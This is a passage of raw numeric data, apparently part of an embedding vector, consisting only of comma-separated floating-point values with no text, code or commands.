,-0.003364137,0.013396494,-0.016789379,-0.01909101,0.020234235,-0.010171229,0.017112393,-0.0014261961,0.002703807,-0.005555601,-0.008588154,0.0022576163,0.026568735,0.03127916,-0.006844695,-0.0027285938,0.02729531,0.005299648,-0.00736895,0.017961035,0.018410712,-0.009715063,0.0099649,0.019609826,-0.013622737,-0.011293076,-0.01885135,-0.0057222326,0.01605675,0.0064357803,0.037793282,0.011462282,-0.013911188,0.036864072,0.014119034,0.00039360227,0.011867144,-0.02943242,-0.015075784,-0.006863973,-0.009782222,0.0007409531,-0.0005354423,-0.0114053935,-0.009240024,-0.0154203465,0.0122502595,-0.0031167222,0.00048331675,-0.0050589615,0.0020885274,0.0093127005,-0.011556132,-0.030234722,-0.0067061502,0.007814731,0.00022934796,-0.00031706685,0.030518109,-0.0001593135,-0.00955096,0.0047302996,0.040441178,0.00678811,-0.015363579,0.0036925767,-0.01820574,-0.0010659711,0.00931671,-0.016869996,-0.005026647,-0.014544376,0.008669929,-0.004589763,0.0062828753,-0.0056407093,-0.000658282,0.049325712,-0.021747487,0.014590359,-0.03590399,-0.011001744,-0.028092753,-0.0061657713,0.0020907824,0.013602808,-0.009182272,-0.00878244,-0.010234876,0.0025089448,0.02463535,-0.016929576,0.012721136,-0.035714652,-0.010184296,0.0053699585,0.010755498,-0.003269388,0.032649506,0.005993071,-0.004701573,0.01011199,0.025631258,0.015872331,-0.02394136,0.021323022,-0.015671754,0.03707329,0.0010729943,0.00017538996,-0.027332356,-0.026664622,-0.0073690247,0.019912122,-0.0029135128,-0.021763306,-0.004013695,-0.0026181608,0.018545385,0.018415894,0.020512404,-0.021359948,0.009628557,-0.0065975157,-0.0183074,-0.0007212847,-0.016398909,-0.018691674,0.0028980968,-0.023719357,0.016960373,-0.0051673944,-0.004565751,0.0008324528,0.07235256,0.012440003,0.0012998385,0.009071994,-0.0048579304,-0.010040409,0.040836997,0.010294724,0.0117496215,0.010360171,-0.02037531,-0.023723835,0.012108737,0.011562047,-0.008864755,0.0062454124,-0.02195943,-0.01733404,-0.014641161,-0.017904626,0.032158248,-0.0011172711,0.013930405,0.026545148,0.0059255487,0.0205314,-0.0015793288,0.006682932,-0.00068082276,-0.018067876,-0.01769966,-0.0020963491,0.000117715914,0.0039958623,-0.051885057,0.023219023,0.0035955324,0.013871618,-0.0078021474,0.00942668,0.012254427,-0.00012836125,-0.011830859,-0.0041649174,-0.008343677,0.053835854,0.01505182,-0.017445032,-0.009596068,0.013057054,-0.0012948203,0.021288488,-0.02152367,0.017378226,0.010151235,0.008056514,0.016790941,-0.034859296,0.03523352,0.037369188,0.0138598,0.021665849,-0.003714869,0.008428976,-0.015089029,0.0358624,-0.01377541,-0.0033687858,-0.0009546887,-0.000491351,0.0034466265,0.0022960354,-0.00059677055,-0.0076225796,-0.0075899265,0.021381369,-0.005156877,-0.014070534,0.0059199682,0.015098527,-0.00868707,-0.007529262,0.015802536,-0.01723491,-0.01631415,-0.0130600985,-0.002262096,0.0026791948,0.0013005544,-0.0030484663,-0.0024480163,0.023303304,0.015012289,-0.0061230767,0.030828653,0.03777805,0.014728584,0.017859107,0.007053755,0.011765162,-0.0016682846,-0.013108933,-0.0056984555,-0.008479967,0.005576024,0.0099561475,0.0020390777,0.0048539406,0.008473901,0.036157887,-0.02057924,0.011169535,0.005843212,-0.012642734,-0.011970169,-0.023241764,-0.017930094,-0.00080473965,-0.015493026,0.008944533,0.03870191,0.011571238,0.0260342,0.016650677,0.00941368,0.014760829,-0.0113846855,-0.012029382,-0.0040874495,0.019835657,0.00199411,0.012638092,0.018436449,-0.035314847,0.021242412,0.015847092,-0.015239019,-0.040640995,0.037770204,0.0044633723,0.014691842,0.035733465,0.04318548,-0.0009924473,0.009774125,0.02078638,0.037256107,0.00445279,-0.015429728,-0.01090567,-0.007982197,-0.0050109695,0.014471169,0.00559411,-0.0027941992,-0.003196053,0.035690177,-0.015932048,-0.00617119,0.022041336,0.03595615,-0.030484756,-0.004106785,0.003158122,-0.010045325,0.02475515,0.017536104,0.073275715,-0.016396722,-0.027918022,0.012323461,0.018189797,-0.011034237,-0.005587657,0.013202254,-0.00722311,0.00048478314,-0.0067813373,0.035747997,0.012620426,0.016261552,-0.015132202,-0.0012579289,0.0038260152,0.008663683,-0.018338973,0.00946732,0.015887255,-0.004439619,-0.0018907603,-0.017150335,-0.021111613,-0.000091732654,0.015413938,0.0026855206,-0.03202584,-0.0134517895,-0.02386175,-0.0141947195,0.018197797,-0.008335189,-0.0018413935,0.009777017,0.013066708,-0.002788845,0.0048394906,0.04437325,-0.010467611,-0.00015765212,-0.0042972756,0.012513174,0.018492796,-0.012479187,0.0056576463,-0.00009200663,0.012174727,-0.007961588,0.008294693,0.02312915,0.023628373,0.01674604,-0.02068114,-0.0056541124,0.019334117,0.005859365,-0.02017181,0.00788154,-0.020048589,0.006751468,-0.015580008,-0.0055898973,-0.0052445736,-0.0064471257,0.0024944914,0.008104688,-0.004555414,-0.023116015,-0.0051231296,0.007833971,-0.01885607,-0.01790474,0.023726257,0.02016151,-0.0028361478,0.023754751,0.0032269596,-0.016476247,0.008303865,0.016093815,-0.00092797563,-0.012778685,0.023354767,-0.002808193,0.0074856025,-0.008922193,0.01217019,-0.0126220025,0.01307753,0.0029623474,0.004429509,0.004794728,0.0126028275,0.011808321,0.012236214,-0.031238222,0.00013664844,0.016990576,-0.015540997,-0.011228254,-0.021083292,0.019477388,-0.011845276,-0.01856738,0.016352056,-0.0045871786,0.0006330867,-0.007005772,0.010780096,-0.04976953,0.0023037235,0.014106588,0.008229334,-0.0068789977,0.038967717,0.021836722,-0.002461154,0.0050881896,-0.0050294427,-0.02096049,-0.0107168285,-0.006751311,0.0075278636,0.016572373,0.0030841716,-0.032247465,-0.014317276,-0.024995867,-0.026002984,-0.016886171,0.033644557,0.0116242785,0.00024601805,0.009743956,0.013543461,-0.008660894,-0.014129242,-0.007867545,-0.03315763,-0.0026359472,0.012641643,-0.022387836,0.018126545,0.011565168,-0.008814626,-0.014200717,-0.038847644,-0.015543607,-0.00065038976,0.0025255787,-0.01977086,0.0005460809,0.01472207,-0.024339221,0.029971726,-0.019486284,0.033876255,-0.00043961412,0.030777082,0.014408301,-0.0066946116,-0.0070302812,0.006754755,-0.022622682,0.022524055,-0.0033707612,0.044052437,0.019340133,0.011689846,0.006227587,-0.0048548146,-0.0068371925,-0.02122433,0.011742416,0.037227534,0.030892849,0.009866795,0.021756029,0.004472726,0.045557406,0.005803057,-0.00053199206,-0.0013780339,0.011884796,0.004634589,-0.0015043082,0.01370153,0.0049773883,0.012027732,-0.011748211,-0.021146769,-0.0018151815,0.027173499,0.020238806,-0.0030307325,0.00448975,-0.0025622093,-0.00017027583,0.010757938,0.0047996026,-0.005556427,-0.004441813,-0.013405953,-0.0053955587,-0.013043413,-0.009634629,-0.042109303,0.019612279,0.011626845,-0.0062486725,-0.01020546,0.0015023765,-0.008952738,0.017547473,-0.008461142,-0.027093958,-0.03060238,-0.007982101,0.024813728,-0.02011131,-0.0155238975,0.011091575,-0.004376858,0.010578876,0.0131572345,-0.033243947,-0.015725948,-0.004762805,-0.009658035,0.011662539,0.02860453,0.022595488,0.011203781,-0.023921473,-0.008721146,-0.019415388,0.0051089353,-0.010547745,-0.0024858536,0.012665225,-0.006940603,-0.009651665,-0.020446358,-0.022397004,0.0027725485,0.0018765695,-0.038493995,-0.021416618,-0.0056957775,0.014401291,0.0020255568,0.008461158,-0.023072887,0.035508018,0.019401334,0.0042084395,0.011138132,-0.0022427428,0.023970455,0.025158294,0.024156353,-0.013394263,-0.031437855,-0.005106648,0.007969182,-0.009211952,0.014460762,0.0053984458,-0.010109771,-0.030462697,-0.01621382,0.0009798054,-0.030491406,0.012944584,-0.0013437194,-0.005914551,0.02786744,-0.01636246,0.019505838,0.026085205,0.0010814344,0.0058376486,-0.0010022669,0.013215707,-0.02533274,-0.019850897,0.027347624,-0.011021595,0.016074438,0.0063946764,-0.04171779,-0.023699382,-0.023544181,0.006339987,-0.010324784,0.028583637,-0.0018836644,-0.00019889418,-0.009830612,0.016578618,-0.015886048,0.0018587359,-0.022254344,-0.0027832228,0.003614592,0.011147192,0.021459762,0.004368993,-0.026536863,0.008346082,0.0001785897,-0.011623291,0.0115465745,0.013200632,0.003045252,-0.00214078,0.022386715,-0.0010625854,-0.017352352,0.019048117,-0.0131656155,-0.002689212,0.027795646,0.012940707,0.0008519196,-0.014451583,-0.01410754,-0.0249866,0.0031745497,0.01584499,-0.009502444,0.009745412,0.0077690897,0.0045044366,0.0033167733,-0.0011780119,0.013914766,0.0035089352,0.0052425237,0.018162282,-0.013313588,-0.016351053,-0.011276987,0.008772137,-0.008489841,-0.0013086062,-0.0016396904,0.009506656,0.02951083,0.030936487,-0.020059507,-0.0012177634,0.02063909,0.0068115704,-0.0006173938,0.0007585194,0.0056420923,-0.011184029,-0.017992059,0.02431318,-0.033866193,-0.017428575,-0.015319367,-0.0039739558,0.017614435,-0.025613403,0.012290449,-0.013826829,-0.0075072297,0.031728514,-0.012755272,0.01229337,-0.005967855,0.004993851,0.001314174,0.00021117931,0.010494729,-0.0045063174,-0.000580715,0.0073767947,-0.0049552717,-0.008015202,0.0083254725,-0.017308552,-0.011208974,0.0013597372,-0.0016422315,0.01997482,0.0134504335,0.0021075413,0.022969438,0.016867638,-0.017629787,0.015678868,-0.0216899,-0.0149460025,-0.01431334,0.0027241101,-0.011852651,-0.013123418,0.00089125143,0.016038643,-0.020690111,-0.021876467,-0.02182747,-0.070237584,0.019198794,-0.013423271,-0.0005764325,0.010007914,0.02350884,0.021259785,0.013895435,0.045100797,0.0067719524,0.02647772,0.010035968,0.005816505,0.014984304,0.016837288,-0.008278823,-0.046518844,-0.0047596656,0.0006036416,-0.008331273,0.0018585608,0.011344556,0.0086637,0.0102344025,0.04147917,0.0018885938,-0.010013101,-0.0049801106,-0.013645165,0.0089918,0.010620502,0.010443869,-0.013852241,-0.00044448968,-0.012837643,-0.009088189,0.00013833605,0.0103392545,-0.010648643,-0.006504744,-0.018150399,0.0012029281,-0.0007067261,0.022530038,-0.013018875,-0.0069233966,0.026441246,-0.019672623,0.0017121332,-0.012694243,0.012897067,-0.0064361994,0.0086464975,0.03514155,-0.017633038,0.028898645,-0.014456831,0.022141349,0.018254092,-0.0060902303,0.004161397,-0.0027470514,0.037083965,0.0046432125,-0.006406763,-0.0036674102,0.0034219755,0.026241906,-0.007677987,-0.016107557,-0.009989171,-0.012291946,0.0027010783,-0.014434236,-0.02838214,0.027792022,-0.0047743805,-0.009288204,-0.0014589827,-0.014579476,-0.015637128,0.01801543,-0.02907737,0.0036402973,-0.021474069,-0.014613147,0.0017317401,0.009998788,0.009728553,-0.02502617,0.0027417284,-0.0039729546,-0.015675731,0.021829024,0.0064164307,0.036868915,-0.0022162786,-0.00904774,0.0018854743,-0.0063061337,0.018124942,0.00453695,-0.0048006875,0.06276313,0.0120746475,0.0010323147,0.006252676,0.02271241,0.032323778,0.020486834,-0.020319518,0.0068537723,-0.011844677,0.009203559,0.02700324,-0.0043565813,-0.010583347,0.008942282,0.018640226,0.04023896,-0.014138496,-0.0077195135,0.028116927,0.009408657,0.0025875478,0.0035057086,0.014183578,0.01019431,-0.019244777,0.009746322,0.004736159,0.016134828,0.0017382168,-0.0073635606,0.015066224,0.0024917594,-0.003484866,-0.018623775,-0.03580286,-0.016172195,-0.019622905,0.004235937,-0.010075678,-0.0033738064,-0.0063191527,-0.012087486,0.009839538,0.0027011284,0.0070622135,0.010617284,0.0003926913,0.006797223,0.012993188,-0.0032433628,-0.00040077974,-0.00055208843,0.005343377,-0.017305898,0.011669662,0.018360026,-0.011293421,-0.026529882,-0.0022604347,0.011812794,-0.037221927,0.0044831517,-0.008070872,-0.002834816,-0.016270481,0.003637665,0.0054893163,0.01535236,-0.0017079174,0.039808907,0.00975155,-0.027469944,0.029657835,0.007987078,-0.00770883,-0.006455965,0.0050162394,0.034409888,0.018929629,0.006571858,0.008105966,-0.012430078,-0.020667825,0.008150922,-0.002722494,0.00082202774,0.00014047377,-0.0038785255,0.005220458,0.0056621255,-0.022869559,0.045471806,-0.006360825,0.02433029,-0.0034857036,-0.02308149,-0.00071375445,0.019441618,0.0028916616,0.016836114,-0.027036024,0.014184692,0.017727941,-0.037781764,-0.012106898,-0.0060779303,0.0007705422,-0.0014669991,0.0049807676,-0.0017557051,-0.010452017,0.00025692434,-0.027181936,0.01571948,0.013873393,-0.010129394,0.013120452,0.021335676,0.024744032,-0.0053688274,0.011731991,-0.034236334,0.015267235,0.019116886,0.0030168109,-0.017839087,0.01453237,-0.009158328,0.020666616,0.019828854,-0.024037892,0.0020512624,0.020495413,0.0052169445,-0.010372226,-0.0072338628,-0.007112072,0.021874417,0.020002784,-0.02285809,-0.008906264,0.03849446,-0.0027537728,-0.01738182,-0.0071195504,0.0070420974,-0.00053280976,-0.0011981754,0.007743566,0.0035220091,-0.01880166,-0.014501438,-0.03159443,-0.010738041,-0.0080345385,-0.008555026,-0.0017372334,-0.0047478233,-0.023923073,-0.0051950016,-0.0013518176,-0.0049889227,0.0027318066,0.0069369813,0.029014485,0.018689502,-0.012400946,0.009393964,0.0032206434,0.0071739117,0.0014283184,-0.010497723,-0.012163075,0.01879416,0.015012548,0.0071174153,-0.0010644153,-0.003867773,0.0023857371,-0.024578167,0.011925733,0.018504191,0.011121326,-0.013660949,0.016434567,0.000098937555,-0.016159644,-0.0318408,0.0020715108,-0.007589013,0.015168893,0.00613513,-0.009699081,-0.009285724,0.007201028,-0.007894252,0.0917461,-0.010622838,0.015091549,-0.011757441,0.009685006,-0.017823039,0.020028261,-0.0029593986,-0.00391175,-0.007426928,-0.019825723,-0.0134235285,-0.011796577,-0.014222938,0.014786246,-0.001435406,0.0027991943,0.026335055,0.005861956,0.00097312167,0.008618085,-0.00085468625,0.0017967857,0.011214879,-0.002429412,0.0068607754,0.020725576,-0.027012505,0.017484974,0.0077985153,0.00042629975,0.013523411,0.008951485,-0.003609792,0.002618777,0.00011254351,0.017209701,-0.0022279979,-0.014372156,0.010901379,-0.005950303,-0.026647368,0.033620242,0.007364238,0.021028887,-0.02184873,-0.012896787,-0.0030498996,-0.000008726757,-0.011611523,0.011171783,-0.013675768,-0.007482109,-0.0024860152,-0.0137491645,0.031264275,-0.008149767,0.022281663,0.015058896,-0.0041009784,-0.0027634136,0.021745216,0.004388686,-0.0036691292,-0.013565708,-0.011003125,0.0013661846,-0.012960338,0.0043413406,-0.018597206,0.018421302,0.00023329357,-0.0039553423,0.012221918,0.001985019,0.014704352,0.014901311,-0.022303123,-0.005876746,-0.027964495,-0.014284023,0.0057879887,0.04033683,0.023086574,-0.011201289,0.0047590574,0.01326399,0.012385912,0.037991375,0.0067969444,0.012912723,-0.010499491,0.0050968537,0.018760784,0.015412547,0.024255019,-0.003743497,0.00028845668,-0.03358629,0.03074419,-0.00940866,0.008627084,0.008771669,-0.019356655,0.00935268,0.009986328,0.008477511,-0.029401861,0.0060670623,0.039587237,0.016957236,-0.0029168723,-0.007353555,-0.0019420373,0.0014378929,-0.0029728815,0.003913345,-0.0027733203,-0.0010705614,0.01343717,0.014405419,-0.0031706702,-0.014847977,-0.045834064,0.0018490624,0.16664413,0.017733525,-0.006975919,0.030474182,-0.0032823174,0.0016156317,-0.1376964,0.0057410575,-0.000070049166,-0.006802971,-0.006598796,-0.0037362454,-0.021557398,0.026266554,0.008928731,0.007855108,-0.00753515,-0.013698553,0.02630316,-0.013932898,-0.0026862111,0.012746332,-0.013998884,0.009341313,-0.0130151985,0.0035750358,0.014784709,-0.020807652,-0.0053068344,-0.027395407,-0.0032033443,-0.0020147737,0.009289188,-0.015512539,-0.024900809,0.014658252,0.018652447,0.003852921,-0.022568822,-0.009877894,0.01727624,-0.0018318432,-0.017595341,-0.025701832,-0.15822196,0.002588652,-0.004273097,-0.03964391,0.009949972,-0.021901986,0.008486706,0.0005582023,0.018837621,-0.0050383527,0.011190196,0.016865537,-0.018761914,0.0036281452,-0.023659352,-0.015874766,-0.0064059184,0.01054932,0.007030801,-0.0072781197,0.0127779255,-0.01733704,-0.011049418,-0.01926215,-0.016307577,0.016603379,0.01619938,0.022787038,-0.013914387,-0.0049654404,-0.0099083455,0.013944445,-0.015404632,0.0013358372,-0.00012685785,-0.012899385,-0.011427776,0.013212592,-0.012983143,0.02465431,-0.030714555,-0.009394065,-0.010525718,-0.01202869,0.0103785535,0.012365526,0.01890551,0.0125824325,0.011784696,-0.00019241925,0.020097995,-0.0021675075,-0.0049909153,-0.0008572206,-0.012023277,-0.015334621,-0.0037968461,-0.014888116,-0.0066526304,0.016870994,-0.015448069,-0.006361596,-0.008337166,-0.013492183,0.039172422,-0.0001960187,0.0021416708,-0.025234062,-0.0008968951,0.015546343,-0.010297586,-0.005225835,0.0045942473,-0.016444005,0.020482702,0.0146872625,-0.002396074,0.014008881,0.01888002,-0.029967451,0.01466425,-0.015094778,0.004033399,-0.017467247,0.011290266,-0.00055386854,0.007536491,0.013938425,0.00040701713,-0.0069682626,0.03402951,-0.0032822522,0.011332049,-0.0019310147,0.019810563,0.016958127,0.043107875,-0.01969272,-0.021124223,-0.00028475095,0.0035924162,-0.019705586,-0.010712513,0.008540829,-0.012117279,0.006391238,0.01210906,-0.018553212,-0.03279064,0.01236529,0.009533553,-0.007372081,0.037236124,0.0054679695,-0.027938453,-0.020640593,0.010771779,0.022466132,0.017014971,-0.020245949,-0.03430776,0.00974735,0.004434446,-0.009929838,0.029124066,0.018657275,-0.030530768,0.0032135497,-0.020174485,-0.00300805,-0.022154398,0.014388953,-0.0032489577,0.006568262,-0.018123114,-0.0034535278,-0.012733452,0.005542048,-0.033808496,-0.009700735,-0.015295127,0.003679161,0.0010320074,-0.008043979,-0.005017001,-0.009184195,0.020800488,-0.009511812,0.012466679,0.0011436064,0.004298261,0.028201886,0.00010877184,-0.024168042,0.009546622,0.05665407,0.007998032,-0.014922648,0.02752689,0.005185647,0.012869751,0.014887819,-0.022615612,-0.012525935,-0.019822702,-0.030770361,-0.010703272,-0.007066418,0.013928549,-0.025063248,0.0168731,0.013116501,0.028894242,0.0012077445,0.011075406,0.020708084,-0.013776136,-0.0058620144,0.020268034,-0.00105502,0.0059350636,-0.00039242342,0.0056071007,0.0000868092,0.012282157,-0.018827159,-0.011139765,-0.0050060204,0.000113251626,0.01681023,-0.049978033,-0.013665061,0.008775488,-0.0056647738,-0.018709686,-0.0012288641,0.014941875,0.01874761,-0.011954907,-0.0033921744,-0.014338514,-0.014748329,0.0049435426,0.0054228846,-0.00072440354,0.0028832862,0.00914673,-0.0043139085,0.0109868655,-0.0067634466,-0.0087415995,-0.0019506216,-0.01315803,0.0039284416,-0.013721416,0.016681775,-0.010033978,-0.016430143,-0.018362619,-0.026720634,-0.008083757,0.002948872,-0.006479696,0.0010878115,0.020829592,-0.0049176905,0.0088303555,-0.016784374,0.007439983,0.0050163963,-0.014670001,-0.022421788,-0.012845177,0.0020304662,0.01829437,0.0063632163,0.013363502,-0.0011309187,0.0029187722,-0.009205308,-0.020804953,-0.007773562,0.03559674,-0.017657174,-0.007462078,0.0072281603,-0.0035398656,-0.0006156442,-0.0026175557,0.011570577,0.03259185,0.0063175918,0.0073723188,0.013625616,-0.010669599,0.017682467,0.01982261,0.005392159,-0.02054146,0.0044756397,-0.017678188,-0.011385901,0.01061093,0.019128969,-0.02113369,0.009501652,-0.01072189,0.01614984,-0.01902666,-0.01377722,0.040753618,-0.0019425269,0.000034958568,0.02567355,-0.0057705995,-0.010908224,-0.0029419344,0.0064629056,-0.014035282,-0.001706051,-0.014016487,0.0076894746,0.014381097,-0.035048697,0.0027349128,-0.0127767455,0.031488787,-0.002778599,0.0024552478,0.00026339266,-0.0022017625,0.004889354,0.01958713,-0.01017112,0.025057368,-0.028880347,-0.009911353,-0.010204228,0.0074934494,-0.0029737663,0.010343655,0.008732118,-0.007928597,-0.023671534,0.008231271,-0.0068429615,0.015608599,-0.006885123,0.0046499786,0.0039478857,0.018329162,-0.019393114,-0.018222133,-0.020862497,-0.022702815,-0.004227146,0.037489317,0.0029737253,-0.0064323237,-0.023397222,0.016945764,0.034673713,0.000027974425,0.020581419,0.0032788406,0.003143809,-0.016966285,0.01414919,0.001134868,-0.009904419,-0.014969462,0.004788584,0.017100846,-0.002944844,-0.024465906,-0.0013090919,0.007315362,-0.016645342,0.005490847,-0.00092428847,0.009427687,0.00032082913,0.044964783,-0.0018410136,-0.008558792,0.00915097,-0.010259592,-0.010386871,-0.00024317144,-0.032817133,0.0031222277,0.02257995,-0.007892237,0.01189118,0.00528796,0.015200264,0.010594971,-0.022366377,-0.015600121,-0.0018127591,-0.0104513215,-0.011726702,-0.022937503,-0.00032523784,-0.0017223647,-0.014867821,-0.019587781,-0.027487459,0.018256174,-0.018971108,-0.0141844405,-0.005305344,0.026271144,0.00071461865,-0.024579674,0.005600983,-0.0032909296,-0.00982782,-0.0067738835,0.014742867,-0.016627377,0.0004918039,0.04238411,-0.015815193,-0.0098832445,-0.0057253675,0.03198684,0.021347817,-0.006358572,0.0032154408,-0.018411279,-0.016559852,0.008816495,-0.035104647,-0.0012065745,0.011244215,-0.030429097,-0.0136509985,0.01732193,0.0062348107,0.0038081605,0.009077269,0.023876457,-0.017101234,0.027146984,0.005386266,-0.023431422,-0.055768907,-0.02092803,0.00055123336,0.0003287401,0.018577117,0.005185893,-0.01588456,-0.030818036,-0.006683978,-0.010426689,0.004926441,-0.0044103926,-0.008451063,0.010692504,0.0010751268,0.022941751,0.003407049,-0.009137406,0.009764922,-0.006105647,-0.006541927,-0.016029175,0.010740898,-0.009277257,0.0050047683,-0.02644286,0.0023398623,0.017697364,0.043523002,-0.022816021,0.030695694,0.0104452735,-0.006765576,-0.0125152655,0.010086437,0.036971003,0.00021078024,-0.03082406,-0.02499235,0.016345767,0.005257825,-0.02738572,-0.010635371,0.0050427523,-0.005186537,-0.0014918551,0.014101607,0.0049410965,0.029982224,-0.0044642603,-0.013489674,0.023462797,0.0053890175,-0.011377372,0.031970896,-0.011035554,0.012784751,-0.001600619,-0.018906385,0.0009375705,0.007094914,0.0029293625,0.015484633,-0.0034533597,0.012365397,0.056303438,-0.008571818,0.019389685,-0.01496043,-0.0115962345,-0.004365881,-0.010069845,-0.030798798,-0.0032752275,-0.017444385,-0.01654704,-0.01641863,-0.0071475795,-0.0061297175,0.004882051,-0.0001225946,-0.14733802,0.008985743,-0.024224006,-0.01380328,-0.019920092,-0.012423347,0.011410409,0.0075556138,0.012211817,-0.030072872,-0.01093957,0.027739724,0.0060515897,0.0043931347,-0.0031963668,0.007743469,-0.032028455,0.008035721,-0.016737107,0.008319682,0.014048969,-0.012947469,0.0030264554,0.0032264183,0.00033444812,0.0011405298,-0.004903458,0.016185375,0.017329602,-0.000016958711,-0.002437131,0.0002979201,0.0031193707,0.004219908,0.01680912,0.008748876,0.0014670026,0.0010053824,-0.018582502,0.007178487,0.0015343765,-0.013951205,0.0020835535,-0.0029794595,0.0068752635,0.010654085,0.006644533,0.036232557,0.0016261096,0.03361877,-0.019877447,0.00072443386,0.004360278,-0.0018857946,0.007035626,-0.010782988,0.0029657432,0.00070017786,0.015284079,0.004113992,-0.016144266,0.0008974637,-0.005640119,0.0042091953,-0.0023351843,-0.005103433,-0.00184345,-0.0041822735,-0.029170226,0.0091682095,-0.010589126,0.017215395,-0.0025844562,0.0030279213,0.00015268843,0.014203511,0.0067895977,-0.007301939,-0.018481875,0.02884709,-0.027742315,-0.0077173156,-0.008158806,0.020131873,-0.007902629,-0.00030582392,-0.0018460242,0.017468588,-0.019238003,0.0052458495,0.0054374035,0.0077763833,-0.0075067505,-0.02419919,-0.012739211,0.0013545172,-0.0017389198,0.008949722,-0.02279095,0.0030769627,-0.016226066,-0.007510596,0.0008918083,-0.027193174,-0.1330702,-0.020192627,0.021345347,0.0067300973,-0.023354406,-0.016350534,0.018609338,0.00905743,0.042159405,-0.0011930728,-0.0058535845,-0.0049904757,-0.017751917,0.0032484555,0.008836362,0.017155766,-0.036726486,-0.013320715,0.00502199,-0.001272022,-0.012214038,-0.016036915,0.008778733,0.022121463,-0.005183175,0.013684402,0.0047739013,0.037251007,0.022728102,-0.0026349458,-0.0016659969,-0.002457872,-0.010222514,0.004333915,-0.057333272,0.010549031,0.0011810777,-0.009570816,0.0052785752,0.021343175,0.0027242084,-0.004588998,0.0155739775,0.009821966,-0.006613934,-0.022739187,-0.0013352002,0.020959428,-0.0134861125,-0.009129742,0.004766724,-0.00067715737,0.0037575883,-0.017500976,-0.012379898,-0.0058044465,0.0046532247,0.0035617207,-0.0031357242,-0.0006307289,0.0005971791,0.009502561,-0.005415799,0.01108328,0.00217172,0.01474811,-0.007093519,0.0018340364,-0.010331254,0.009260921,0.008524729,0.030451754,-0.002568656,-0.013878499,0.029027637,-0.012603865,0.010536104,0.021062734,0.011181722,0.0037222416,-0.0006558575,-0.008999504,0.010925632,0.0076165465,-0.019712426,0.018767504,0.012160043,-0.0035414018,-0.014222498,-0.0055309334,0.014383803,0.003857179,-0.0018722325,0.01361473,0.008302451,0.016188154,0.04892158,0.01941921,-0.031227503,-0.0026230367,-0.008670691,-0.008888587,0.0067050536,0.00083854015,-0.019864606,0.02411063,0.036334842,-0.005196915,0.003991563,0.002245489,-0.0058380594,0.027829263,-0.024347678,0.013667267,-0.0007009963,0.012101896,-0.000062039035,0.0059882076,0.0015816645,-0.002059786,0.019144386,0.0059603793,-0.0008194471,-0.015003494,0.009210219,-0.019597594,-0.009560319,0.010120666,0.014494239,-0.0374749,0.0026453917,0.000954702,0.02003948,-0.0044786423,0.0053436514,0.010146962,-0.015650216,0.008311814,0.010140162,0.012277924,-0.0045353347,0.0012961314,-0.012922527,-0.0045998767,-0.005049168,0.011734172,-0.018046154,-0.017094376,-0.011903961,0.0030400306,-0.0033150085,-0.021851853,0.028780015,0.015567346,0.004707379,0.0070305853,-0.020112984,0.004110685,0.0072202682,0.008535265,-0.019866299,0.017700136,0.036545344,-0.01746327,-0.008417853,-0.003786312,-0.0029582796,0.010553499,0.0006046741,0.019060094,0.004785797,-0.0013801923,0.0068779797,-0.05330061,0.014639936,0.0038803879,0.01617594,0.013837665,0.018727876,0.021392072,-0.0043421364,-0.0020413469,-0.0039946474,-0.012115526,0.010755607,0.019914852,-0.010100903,-0.0048928717,0.0065951208,-0.013555,0.052384656,0.0108743515,-0.014350137,-0.021399429,0.010329754,-0.012553203,0.0027636925,-0.010492461,0.0073342347,0.006800458,-0.018558787,0.012603057,0.0133011835,-0.006315309,0.0018052411,0.011203444,0.0046698023,0.016876416,0.0028874886,-0.0160561,-0.013644743,0.031370036,-0.0031103878,-0.0032265256,0.009229946,0.0215391,0.0007226741,-0.034374125,0.021897621,0.017513106,-0.015997736,-0.02491573,0.0141638275,-0.000043158903,-0.0037068296,0.046307098,0.021379778,0.007813081,-0.026541516,-0.014067524,0.0018115644,0.01068068,-0.030055596,0.001264506,0.004956269,-0.002958152,0.033956986,0.011020426,-0.0026196623,0.0007475611,0.020083318,0.019327173,0.02666574,0.018781826,0.013923766,-0.0029088468,0.010240691,-0.022520531,0.014987671,0.032583285,-0.007943479,0.0024497295,-0.00946965,-0.011794975,-0.005167888,0.008989338,0.0071206167,0.0067491033,-0.00894211,0.011678812,-0.022042634,-0.011361524,-0.015670525,-0.0112996735,-0.004565182,-0.0056994157,0.0037111577,-0.017011115,0.0063701314,0.0069929343,0.003007001,0.0052051446,-0.024186358,0.026894422,-0.021303471,-0.005765184,-0.011054117,-0.0021804431,0.010729031,0.0023677167,0.011277747,-0.015714787,0.00007017514,0.014569871,-0.00688359,0.014483654,0.0029459675,-0.008793059,-0.0038733182,-0.0031368935,-0.0006458186,-0.008929598,-0.0050266525,-0.01169539,-0.013464873,0.0049357545,0.015262105,-0.0016528311,0.005207378,0.011174188,0.007855337,-0.013820873,-0.010872254,-0.005621607,0.009739562,-0.0065115294,-0.0017809131,0.0276559,0.01200764,-0.020248992,-0.00941784,0.009524441,-0.005064869,0.017509898,0.016212435,-0.0069840117,-0.010861441,-0.0022262142,-0.04447626,-0.017488545,-0.0037667044,-0.014997672,0.0037162628,-0.01668683,0.013815164,0.0045972723,0.0066486313,0.03069668,-0.022661563,-0.0069049415,0.015052328,-0.030743819,-0.0070166904,-0.0068437723,0.017967414,0.0014937678,0.02000395,0.0267793,-0.013354877,0.02503585,0.009267226,0.004687963,0.0032210858,0.003386341,0.0019308913,0.018364606,-0.0062589627,0.013782917,0.0030643053,0.0059465086,0.017581334,-0.0008301078,0.012706696,-0.008598091,-0.031368025,0.022706166,-0.037967198,-0.0014474655,-0.006269577,0.006952012,-0.021422043,0.0028501765,-0.0066839103,-0.017842231,-0.01243652,-0.0150053,-0.02230355,0.01769153,-0.012573191,0.009799984,-0.016901653,0.028480731,-0.018642219,-0.028693886,-0.0107630165,-0.10187948,0.005091309,0.0037477002,0.013328898,0.035345793,0.0017348297,-0.011346777,-0.008300426,-0.005372227,0.0073862956,0.0005352596,-0.0046223607,-0.025848305,-0.010704442,0.03914864,0.00911368,-0.031303678,0.0014989835,-0.001610929,-0.026017806,0.01803056,-0.0035569319,-0.009931721,-0.017692512,0.019779189,-0.009480387,0.0017537831,0.0030811527,0.011238592,-0.0057297195,-0.006475663,0.006837637,-0.0017464109,0.009799956,-0.016644357,0.0065323636,-0.009414213,0.0076498706,-0.01706318,-0.037936047,-0.0035101143,0.01523034,0.00647054,0.0039658058,-0.021588607,0.01926704,-0.02565701,-0.002704992,-0.00082761236,0.009602966,-0.011862519,0.01889853,0.006152605,0.021221332,-0.0057860725,0.0017442536,0.0029074312,-0.0070905047,0.0161471,0.00482849,-0.010980422,-0.0010789149,0.010234453,-0.0012469834,-0.